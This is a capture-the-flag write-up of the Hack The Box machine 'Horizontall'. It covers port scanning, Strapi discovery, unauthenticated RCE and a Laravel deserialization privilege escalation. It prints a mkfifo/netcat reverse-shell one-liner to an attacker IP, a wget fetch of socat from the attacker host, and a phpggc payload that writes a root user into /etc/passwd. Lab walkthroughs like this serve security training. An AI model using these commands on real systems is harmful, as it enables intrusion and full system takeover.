Nmap
Source Code
Whatweb
Exploitation
Post exploitation
Enumeration
Nmap
Privilege escalation: strapi to root
Preparations
Exploitation
Welcome to the Horizontall writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Horizontall
tags: HTB
Easy
Linux
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here

Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -n -sS -T5 -p- 10.10.11.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 11:08 CEST
Nmap scan report for 10.10.11.105
Host is up (0.087s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 65.38 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -Pn -A -p 22,80 10.10.11.105 --script vuln
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 11:16 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.11.105
Host is up (0.087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
[...]
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-csrf: Couldn´t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn´t find any DOM based XSS.
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-stored-xss: Couldn´t find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:igor_sysoev:nginx:1.14.0:
| CVE-2019-9513 7.8 https://vulners.com/cve/CVE-2019-9513
| CVE-2019-9511 7.8 https://vulners.com/cve/CVE-2019-9511
| CVE-2018-16844 7.8 https://vulners.com/cve/CVE-2018-16844
| CVE-2018-16843 7.8 https://vulners.com/cve/CVE-2018-16843
| CVE-2021-23017 7.5 https://vulners.com/cve/CVE-2021-23017
| CVE-2019-9516 6.8 https://vulners.com/cve/CVE-2019-9516
| CVE-2018-16845 5.8 https://vulners.com/cve/CVE-2018-16845
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 86.63 ms 10.10.14.1
2 87.81 ms 10.10.11.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 256.33 seconds
Source Code
Inside the website source code we can find some .js
files and if we read the content of http://horizontall.htb/js/app.c68eb462.js we can find a subdomain
methods: {
getReviews: function() {
var t = this;
r.a.get("http://api-prod.horizontall.htb/reviews").then((function(s) {
return t.reviews = s.data
}))
}
}
Whatweb
We can identify the used software strapi
with whatweb
.
$ whatweb http://api-prod.horizontall.htb/
http://api-prod.horizontall.htb/ [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], IP[10.10.11.105], Strict-Transport-Security[max-age=31536000; includeSubDomains], Title[Welcome to your API], UncommonHeaders[content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[Strapi <strapi.io>], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block], nginx[1.14.0]
Exploitation
Now, searching in internet we can find this exploit to get Unauthenticated RCE
.
Let's put a terminal to listen and run a reverse shell and hopefully we'll be lucky.
$ python3 strapi-rce.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjMwNDA1MzAwLCJleHAiOjE2MzI5OTczMDB9.TAmtc1S9OFrrle_KBtNSZ9YuRarLsb-wbm1CtcT4mek
$> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.29 8787 >/tmp/f
[+] Triggering Remote code executin
[*] Rember this is a blind RCE don't expect to see output
<html>
<head><title>504 Gateway Time-out</title></head>
<body bgcolor="white">
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>
$>
Yeah! We have shell as strapi.
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.11.105] 45088
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(strapi) gid=1001(strapi) groups=1001(strapi)
$
And we can read the user flag.
strapi@horizontall:~/myapi$ ls /home/developer
composer-setup.php myproject user.txt
strapi@horizontall:~/myapi$ cat /home/developer/user.txt
CENSORED_FLAG
Post exploitation
Enumeration
Nmap
If we list the listening ports we can find port 8000 that is listening locally.
strapi@horizontall:~/.pm2$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1811/node /usr/bin/ off (0.00/0/0)
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN - off (0.00/0/0)
[...]
When we run curl on the port, we can see that there is a Laravel version 8 installation on the port.
strapi@horizontall:~$ curl 127.0.0.1:8000
<!DOCTYPE html>
[...]
<div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
Laravel v8 (PHP v7.4.18)
</div>
[...]
Looking a bit on the internet, we can find this exploit.
Privilege escalation: strapi to root
Preparations
In order to use the exploit, we need to do port forwarding
to be able to access port 8000
from our machine. For this we are going to use socat
.
We are going to load the binary to the machine.
strapi@horizontall:~$ wget 10.10.14.5/socat
--2021-08-31 11:34:58-- http://10.10.14.5/socat
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 378384 (370K) [application/octet-stream]
Saving to: ‘socat’
socat 100%[==============================================>] 369.52K 296KB/s in 1.2s
2021-08-31 11:35:00 (296 KB/s) - ‘socat’ saved [378384/378384]
Now we create the tunnel...
strapi@horizontall:~$ ./socat tcp-l:8001,fork,reuseaddr tcp:localhost:8000
And we connect to it.
$ nc 10.10.11.105 8001
Exploitation
The first step is to create our payload using phpggc that we can get from this repository.
The payload that we are going to create should inject a user with root
privileges in the /etc/passwd
file.
$ php -d'phar.readonly=0' ./phpggc/phpggc --phar phar -o exploit.phar --fast-destruct monolog/rce1 system 'echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd'
And now is the time to run the exploit.
$ python3 laravel2.py http://10.10.11.105:8001/ exploit.phar
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
Exploit succeeded
+ Logs cleared
Perfect! now we only have to authenticate with the injected user and read the root flag!
strapi@horizontall:~$ su x4v1l0k
Password:
root@horizontall:/opt/strapi# id
uid=0(root) gid=0(root) groups=0(root)
root@horizontall:/opt/strapi# cd
root@horizontall:~# cat root.txt
CENSORED_FLAG